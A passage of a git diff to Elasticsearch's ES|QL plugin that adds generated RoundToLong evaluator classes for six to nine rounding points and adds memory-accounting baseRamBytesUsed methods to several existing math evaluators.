org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLong4Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong4Evaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -60,6 +63,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong6Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong6Evaluator.java new file mode 100644 index 0000000000000..2d21733fb086e --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong6Evaluator.java @@ -0,0 +1,169 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. 
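+// Every evaluator in this patch carries two eval overloads, dispatched in
+// eval(Page): a Block path that must null-check and reject multi-values per
+// position, and a Vector fast path taken when asVector() succeeds, i.e. when
+// every position holds exactly one non-null value. In sketch form:
+//
+//   LongVector v = block.asVector();
+//   return v == null
+//       ? eval(positionCount, block)         // slow path: null / multi-value checks
+//       : eval(positionCount, v).asBlock();  // fast path: tight unchecked loop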
+package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. + */ +public final class RoundToLong6Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong6Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong6Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 
+ "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + } + + @Override + public RoundToLong6Evaluator get(DriverContext context) { + return new RoundToLong6Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, context); + } + + @Override + public String toString() { + return "RoundToLong6Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong7Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong7Evaluator.java new file mode 100644 index 0000000000000..7bc385af72a9c --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong7Evaluator.java @@ -0,0 +1,175 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
+ */ +public final class RoundToLong7Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong7Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong7Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, long p6, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + public Factory(Source source, 
EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5, long p6) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + } + + @Override + public RoundToLong7Evaluator get(DriverContext context) { + return new RoundToLong7Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, context); + } + + @Override + public String toString() { + return "RoundToLong7Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong8Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong8Evaluator.java new file mode 100644 index 0000000000000..a5b66f3fd9c0e --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong8Evaluator.java @@ -0,0 +1,181 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
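+ * <p>The eight {@code long} parameters {@code p0}..{@code p7} are fixed when the evaluator is constructed and threaded straight into {@code RoundToLong.process} for every row, so this specialization needs no per-row lookup structure.</p>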
+ */ +public final class RoundToLong8Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong8Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong8Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, long p6, long p7, DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + 
private final long p5; + + private final long p6; + + private final long p7; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5, long p6, long p7) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + } + + @Override + public RoundToLong8Evaluator get(DriverContext context) { + return new RoundToLong8Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, context); + } + + @Override + public String toString() { + return "RoundToLong8Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong9Evaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong9Evaluator.java new file mode 100644 index 0000000000000..1e13bbf62926a --- /dev/null +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLong9Evaluator.java @@ -0,0 +1,188 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License +// 2.0; you may not use this file except in compliance with the Elastic License +// 2.0. +package org.elasticsearch.xpack.esql.expression.function.scalar.math; + +import java.lang.IllegalArgumentException; +import java.lang.Override; +import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.LongBlock; +import org.elasticsearch.compute.data.LongVector; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.EvalOperator; +import org.elasticsearch.compute.operator.Warnings; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.xpack.esql.core.tree.Source; + +/** + * {@link EvalOperator.ExpressionEvaluator} implementation for {@link RoundToLong}. + * This class is generated. Edit {@code EvaluatorImplementer} instead. 
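+ * <p>{@code baseRamBytesUsed()} returns the shallow size of this instance, pre-computed once via {@link RamUsageEstimator#shallowSizeOfInstance}, plus the base usage of the upstream {@code field} evaluator, so callers can cheaply estimate the footprint of the whole evaluator chain.</p>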
+ */ +public final class RoundToLong9Evaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLong9Evaluator.class); + + private final Source source; + + private final EvalOperator.ExpressionEvaluator field; + + private final long p0; + + private final long p1; + + private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final long p8; + + private final DriverContext driverContext; + + private Warnings warnings; + + public RoundToLong9Evaluator(Source source, EvalOperator.ExpressionEvaluator field, long p0, + long p1, long p2, long p3, long p4, long p5, long p6, long p7, long p8, + DriverContext driverContext) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + this.driverContext = driverContext; + } + + @Override + public Block eval(Page page) { + try (LongBlock fieldBlock = (LongBlock) field.eval(page)) { + LongVector fieldVector = fieldBlock.asVector(); + if (fieldVector == null) { + return eval(page.getPositionCount(), fieldBlock); + } + return eval(page.getPositionCount(), fieldVector).asBlock(); + } + } + + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + + public LongBlock eval(int positionCount, LongBlock fieldBlock) { + try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + if (fieldBlock.isNull(p)) { + result.appendNull(); + continue position; + } + if (fieldBlock.getValueCount(p) != 1) { + if (fieldBlock.getValueCount(p) > 1) { + warnings().registerException(new IllegalArgumentException("single-value function encountered multi-value")); + } + result.appendNull(); + continue position; + } + result.appendLong(RoundToLong.process(fieldBlock.getLong(fieldBlock.getFirstValueIndex(p)), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + public LongVector eval(int positionCount, LongVector fieldVector) { + try(LongVector.FixedBuilder result = driverContext.blockFactory().newLongVectorFixedBuilder(positionCount)) { + position: for (int p = 0; p < positionCount; p++) { + result.appendLong(p, RoundToLong.process(fieldVector.getLong(p), this.p0, this.p1, this.p2, this.p3, this.p4, this.p5, this.p6, this.p7, this.p8)); + } + return result.build(); + } + } + + @Override + public String toString() { + return "RoundToLong9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + + @Override + public void close() { + Releasables.closeExpectNoException(field); + } + + private Warnings warnings() { + if (warnings == null) { + this.warnings = Warnings.createWarnings( + driverContext.warningsMode(), + source.source().getLineNumber(), + source.source().getColumnNumber(), + source.text() + ); + } + return warnings; + } + + static class Factory implements EvalOperator.ExpressionEvaluator.Factory { + private final Source source; + + private final EvalOperator.ExpressionEvaluator.Factory field; + + private final long p0; + + private final long p1; + + 
private final long p2; + + private final long p3; + + private final long p4; + + private final long p5; + + private final long p6; + + private final long p7; + + private final long p8; + + public Factory(Source source, EvalOperator.ExpressionEvaluator.Factory field, long p0, long p1, + long p2, long p3, long p4, long p5, long p6, long p7, long p8) { + this.source = source; + this.field = field; + this.p0 = p0; + this.p1 = p1; + this.p2 = p2; + this.p3 = p3; + this.p4 = p4; + this.p5 = p5; + this.p6 = p6; + this.p7 = p7; + this.p8 = p8; + } + + @Override + public RoundToLong9Evaluator get(DriverContext context) { + return new RoundToLong9Evaluator(source, field.get(context), p0, p1, p2, p3, p4, p5, p6, p7, p8, context); + } + + @Override + public String toString() { + return "RoundToLong9Evaluator[" + "field=" + field + ", p0=" + p0 + ", p1=" + p1 + ", p2=" + p2 + ", p3=" + p3 + ", p4=" + p4 + ", p5=" + p5 + ", p6=" + p6 + ", p7=" + p7 + ", p8=" + p8 + "]"; + } + } +} diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongBinarySearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongBinarySearchEvaluator.java index affd383be6f4e..f49c1fdbfa38e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongBinarySearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongBinarySearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class RoundToLongBinarySearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLongBinarySearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongLinearSearchEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongLinearSearchEvaluator.java index 62a6c81d148e3..343cba68ec722 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongLinearSearchEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundToLongLinearSearchEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class RoundToLongLinearSearchEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundToLongLinearSearchEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator field; @@ -51,6 +54,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += field.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock fieldBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundUnsignedLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundUnsignedLongEvaluator.java index 70cc9986f2d9d..5ca8fbc060567 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundUnsignedLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/RoundUnsignedLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.LongBlock; import org.elasticsearch.compute.data.LongVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
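+ * <p>This evaluator wraps two child evaluators, so the new {@code baseRamBytesUsed()} charges the base usage of both {@code val} and {@code decimals} on top of the shallow instance size.</p>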
*/ public final class RoundUnsignedLongEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(RoundUnsignedLongEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator val; @@ -58,6 +61,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += val.baseRamBytesUsed(); + baseRamBytesUsed += decimals.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public LongBlock eval(int positionCount, LongBlock valBlock, LongBlock decimalsBlock) { try(LongBlock.Builder result = driverContext.blockFactory().newLongBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantIntEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantIntEvaluator.java index 1b68a10a8a976..668e96c6b7074 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantIntEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantIntEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. */ public final class ScalbConstantIntEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ScalbConstantIntEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator d; @@ -52,6 +55,13 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += d.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public DoubleBlock eval(int positionCount, DoubleBlock dBlock) { try(DoubleBlock.Builder result = driverContext.blockFactory().newDoubleBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantLongEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantLongEvaluator.java index 0e970db07a280..b8d713b16b509 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantLongEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/function/scalar/math/ScalbConstantLongEvaluator.java @@ -8,6 +8,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.DoubleBlock; import org.elasticsearch.compute.data.DoubleVector; @@ -23,6 +24,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
